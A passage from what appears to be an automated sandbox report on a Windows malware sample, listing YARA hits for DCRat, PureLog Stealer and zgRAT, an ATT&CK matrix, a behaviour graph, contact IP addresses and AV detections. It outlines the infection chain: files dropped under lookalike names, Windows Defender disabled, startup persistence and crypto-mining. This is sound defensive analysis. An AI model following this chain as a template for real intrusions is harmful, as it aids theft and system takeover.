                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_hashlib.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_queue.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\unicodedata.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Bridgeprovider.exeQueries volume information: C:\Windows\Bridgeprovider.exe VolumeInformation
                                  Source: C:\Windows\Bridgeprovider.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\Bridgeprovider.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0088DF1E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB6560 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,56_2_00007FF7B1DB6560
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087B146 GetVersionExW,0_2_0087B146
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Bridgeprovider.exe PID: 4144, type: MEMORYSTR
                                  Yara detected PureLog Stealer
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000003.1862977285.00000000093AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000003C.00000003.1922516714.0000000006A62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000041.00000000.1945948494.0000000000CB2000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Bridgeprovider.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\1.exe, type: DROPPED
                                  Yara detected zgRAT
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Bridgeprovider.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\1.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Bridgeprovider.exe PID: 4144, type: MEMORYSTR
                                  Yara detected PureLog Stealer
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000003.1862977285.00000000093AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000003C.00000003.1922516714.0000000006A62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000041.00000000.1945948494.0000000000CB2000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Bridgeprovider.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\1.exe, type: DROPPED
                                  Yara detected zgRAT
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Bridgeprovider.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\1.exe, type: DROPPED
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005DA3 bind,WSAGetLastError,62_2_00007FFDFB005DA3

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information111
                                  Scripting                                  		Valid Accounts1
                                  Windows Management Instrumentation                                  		111
                                  Scripting                                  		1
                                  Exploitation for Privilege Escalation                                  		31
                                  Disable or Modify Tools                                  		OS Credential Dumping2
                                  System Time Discovery                                  		1
                                  Taint Shared Content                                  		11
                                  Archive Collected Data                                  		1
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts5
                                  Native API                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		11
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory1
                                  System Service Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Encrypted Channel                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter                                  		33
                                  Windows Service                                  		1
                                  Access Token Manipulation                                  		3
                                  Obfuscated Files or Information                                  		Security Account Manager3
                                  File and Directory Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive11
                                  Non-Standard Port                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Scheduled Task/Job                                  		1
                                  Scheduled Task/Job                                  		33
                                  Windows Service                                  		1
                                  Software Packing                                  		NTDS37
                                  System Information Discovery                                  		Distributed Component Object ModelInput Capture2
                                  Non-Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts12
                                  Service Execution                                  		321
                                  Registry Run Keys / Startup Folder                                  		12
                                  Process Injection                                  		1
                                  DLL Side-Loading                                  		LSA Secrets331
                                  Security Software Discovery                                  		SSHKeylogging2
                                  Application Layer Protocol                                  		Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable Media1
                                  PowerShell                                  		1
                                  Services File Permissions Weakness                                  		1
                                  Scheduled Task/Job                                  		1
                                  File Deletion                                  		Cached Domain Credentials231
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items321
                                  Registry Run Keys / Startup Folder                                  		131
                                  Masquerading                                  		DCSync4
                                  Process Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                                  Services File Permissions Weakness                                  		231
                                  Virtualization/Sandbox Evasion                                  		Proc Filesystem1
                                  Application Window Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Access Token Manipulation                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                  Process Injection                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                  Services File Permissions Weakness                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1571089 Sample: IYXE4Uz61k.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 149 Suricata IDS alerts for network traffic 2->149 151 Found malware configuration 2->151 153 Malicious sample detected (through community Yara rule) 2->153 155 16 other signatures 2->155 14 IYXE4Uz61k.exe 6 2->14         started        18 Wmiic.exe 2->18         started        process3 file4 141 C:\ProgramData\migrate.exe, PE32 14->141 dropped 205 Modifies Windows Defender protection settings 14->205 207 Adds extensions / path to Windows Defender exclusion list 14->207 209 Disables Windows Defender (via service or powershell) 14->209 20 cmd.exe 1 14->20         started        23 powershell.exe 28 14->23         started        25 powershell.exe 25 14->25         started        211 Drops executables to the windows directory (C:\Windows) and starts them 18->211 27 IntelConfigService.exe 18->27         started        29 conhost.exe 18->29         started        signatures5 process6 signatures7 165 Wscript starts Powershell (via cmd or directly) 20->165 167 Drops PE files to the startup folder 20->167 169 Modifies Windows Defender protection settings 20->169 179 2 other signatures 20->179 31 cmd.exe 1 20->31         started        34 conhost.exe 20->34         started        171 Loading BitLocker PowerShell Module 23->171 36 conhost.exe 23->36         started        38 conhost.exe 25->38         started        173 Multi AV Scanner detection for dropped file 27->173 175 Binary is likely a compiled AutoIt script file 27->175 177 Drops executables to the windows directory (C:\Windows) and starts them 27->177 40 MSTask.exe 27->40         started        43 Wrap.exe 27->43         started        45 Superfetch.exe 27->45         started        47 3 other processes 27->47 process8 file9 213 Wscript starts Powershell (via cmd or directly) 31->213 215 Modifies Windows Defender protection settings 31->215 217 Adds extensions / path to Windows Defender exclusion list 31->217 219 Disables Windows Defender (via service or powershell) 31->219 49 migrate.exe 31->49         started        53 powershell.exe 23 31->53         started        55 powershell.exe 31->55         started        66 15 other processes 31->66 127 C:\Windows\Temp\_MEI81722\unicodedata.pyd, PE32+ 40->127 dropped 129 C:\Windows\Temp\_MEI81722\select.pyd, PE32+ 40->129 dropped 131 C:\Windows\Temp\_MEI81722\python38.dll, PE32+ 40->131 dropped 133 15 other files (12 malicious) 40->133 dropped 221 Multi AV Scanner detection for dropped file 40->221 223 Drops executables to the windows directory (C:\Windows) and starts them 40->223 225 Potentially malicious time measurement code found 40->225 57 MSTask.exe 40->57         started        60 conhost.exe 40->60         started        227 Found API chain indicative of debugger detection 43->227 62 cmd.exe 43->62         started        64 conhost.exe 43->64         started        229 Binary is likely a compiled AutoIt script file 45->229 68 6 other processes 47->68 signatures10 process11 dnsIp12 109 C:\Windows\Tasks\Wrap.exe, PE32+ 49->109 dropped 111 C:\Windows\Tasks\Wmiic.exe, PE32+ 49->111 dropped 113 C:\Windows\Tasks\WinRing0x64.sys, PE32+ 49->113 dropped 115 7 other malicious files 49->115 dropped 157 Binary is likely a compiled AutoIt script file 49->157 159 Sample is not signed and drops a device driver 49->159 70 cmd.exe 49->70         started        161 Loading BitLocker PowerShell Module 53->161 143 45.137.64.40, 49738, 80 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 57->143 163 Drops executables to the windows directory (C:\Windows) and starts them 62->163 74 ApplicationsFrameHost.exe 62->74         started        file13 signatures14 process15 dnsIp16 125 C:\ProgramData\Microsoft\...\MicrosoftPrt.exe, PE32+ 70->125 dropped 187 Drops executables to the windows directory (C:\Windows) and starts them 70->187 77 1.exe 70->77         started        81 Wmiic.exe 70->81         started        83 Wmiic.exe 70->83         started        85 5 other processes 70->85 145 185.17.0.139, 49735, 49739, 49740 SUPERSERVERSDATACENTERRU Russian Federation 74->145 189 Multi AV Scanner detection for dropped file 74->189 191 Query firmware table information (likely to detect VMs) 74->191 193 Found strings related to Crypto-Mining 74->193 file17 195 Detected Stratum mining protocol 145->195 signatures18 process19 file20 137 C:\Windows\Bridgeprovider.exe, PE32 77->137 dropped 139 C:\Windows\fwJLoWFGhpY.bat, ASCII 77->139 dropped 203 Multi AV Scanner detection for dropped file 77->203 87 wscript.exe 77->87         started        90 conhost.exe 81->90         started        92 conhost.exe 83->92         started        94 net1.exe 85->94         started        signatures21 process22 signatures23 197 Wscript starts Powershell (via cmd or directly) 87->197 199 Windows Scripting host queries suspicious COM object (likely to drop second stage) 87->199 96 cmd.exe 87->96         started        process24 signatures25 147 Drops executables to the windows directory (C:\Windows) and starts them 96->147 99 Bridgeprovider.exe 96->99         started        103 conhost.exe 96->103         started        process26 file27 117 C:\Windows\INF\MicrosoftDefenger.exe, PE32 99->117 dropped 119 C:\Users\user\Desktop\vrXfSuSA.log, PE32 99->119 dropped 121 C:\Users\user\Desktop\tvjECxvw.log, PE32 99->121 dropped 123 23 other malicious files 99->123 dropped 181 Multi AV Scanner detection for dropped file 99->181 183 Creates an undocumented autostart registry key 99->183 185 Creates an autostart registry key pointing to binary in C:\Windows 99->185 105 csc.exe 99->105         started        signatures28 process29 file30 135 C:\Windows\...\SecurityHealthSystray.exe, PE32 105->135 dropped 201 Infects executable files (exe, dll, sys, html) 105->201 signatures31

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  IYXE4Uz61k.exe34%ReversingLabsWin32.Trojan.AvKiller

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\Desktop\UtDRkwHy.log100%AviraHEUR/AGEN.1300079
                                  C:\Users\user\Desktop\KbrUPpvT.log100%AviraHEUR/AGEN.1300079
                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe100%AviraTR/ClipBanker.zcrtc
                                  C:\Users\user\AppData\Local\Temp\EekRrdxVrk.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\OShKWlwM.log100%AviraHEUR/AGEN.1362695
                                  C:\Users\user\Desktop\IIxTfkxV.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\DmmmRJbk.log100%AviraHEUR/AGEN.1300079
                                  C:\Users\user\Desktop\QLwtIihK.log100%AviraHEUR/AGEN.1300079
                                  C:\Users\user\Desktop\IZEltFrY.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\UtDRkwHy.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\KbrUPpvT.log100%Joe Sandbox ML
                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\OShKWlwM.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\DmmmRJbk.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\Aepdvrho.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\QLwtIihK.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\fZypqYbb.log100%Joe Sandbox ML
                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe39%ReversingLabsWin64.Infostealer.ClipBanker
                                  C:\ProgramData\migrate.exe8%ReversingLabs
                                  C:\Users\user\Desktop\Aepdvrho.log8%ReversingLabs
                                  C:\Users\user\Desktop\AtXEfMql.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\DmmmRJbk.log17%ReversingLabs
                                  C:\Users\user\Desktop\EjOumJqe.log8%ReversingLabs
                                  C:\Users\user\Desktop\HcddYGcd.log4%ReversingLabs
                                  C:\Users\user\Desktop\IIxTfkxV.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
